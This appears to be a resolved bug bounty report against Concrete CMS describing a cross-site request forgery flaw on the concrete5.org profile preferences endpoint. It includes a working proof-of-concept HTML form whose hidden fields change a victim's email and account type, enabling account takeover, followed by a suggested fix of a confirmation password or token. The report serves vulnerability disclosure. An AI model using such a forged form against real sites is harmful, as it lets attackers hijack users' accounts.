CSRF Full Account Takeover
C
Concrete CMS
Submitted None
Actions:
Reported by
khalidamin
Vulnerability Details
Technical details and impact analysis
Try this code in your browser:
<html>
<body>
<form action="https://www.concrete5.org/profile/preferences/-/save/" method="POST">
<input type="hidden" name="uName" value="██████" />
<input type="hidden" name="uEmail" value="████" />
<input type="hidden" name="uAccountType" value="owner" />
<input type="hidden" name="profile_private_messages_notification_enabled" value="1" />
<input type="hidden" name="uPasswordOld" value="" />
<input type="hidden" name="uPasswordNew" value="" />
<input type="hidden" name="uPasswordNewConfirm" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
You need to ask for confirming password for changing settings, or use a token everytime it is changed.
If any further information is needed, plase ask.
Thanks.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-Site Request Forgery (CSRF)